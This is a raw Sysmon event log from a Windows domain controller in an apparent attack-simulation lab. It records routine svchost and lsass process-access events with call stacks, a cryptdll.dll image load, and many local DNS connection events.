09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x80000000000000001054490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.222{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\System32\dfssvc.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000001054489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.222{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\system32\dfssvc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.222{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.206{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x80000000000000001054689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.313{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local54972- 354300x80000000000000001054688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.313{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local64899- 354300x80000000000000001054687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.312{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49768- 354300x80000000000000001054686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.312{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53447- 354300x80000000000000001054685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.309{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62802- 354300x80000000000000001054684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.308{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local49301- 354300x80000000000000001054683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.308{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49723- 354300x80000000000000001054682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.305{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50960- 354300x80000000000000001054681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.304{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local56380- 354300x80000000000000001054680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.304{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62301- 354300x80000000000000001054679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.304{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local65042- 354300x80000000000000001054678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.303{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52615- 354300x80000000000000001054677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.302{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53842- 354300x80000000000000001054676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.302{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local51579- 354300x80000000000000001054675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.301{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50938- 354300x80000000000000001054674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.297{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local63077- 354300x80000000000000001054673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.294{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53378- 354300x80000000000000001054672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.294{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local49709- 354300x80000000000000001054671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.293{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50469- 354300x80000000000000001054670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.291{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51675- 354300x80000000000000001054669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.290{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local52635- 354300x80000000000000001054668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.290{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local63335- 354300x80000000000000001054667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.289{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53843- 354300x80000000000000001054666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.287{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55164- 354300x80000000000000001054665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.286{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local62992- 354300x80000000000000001054664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.283{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT 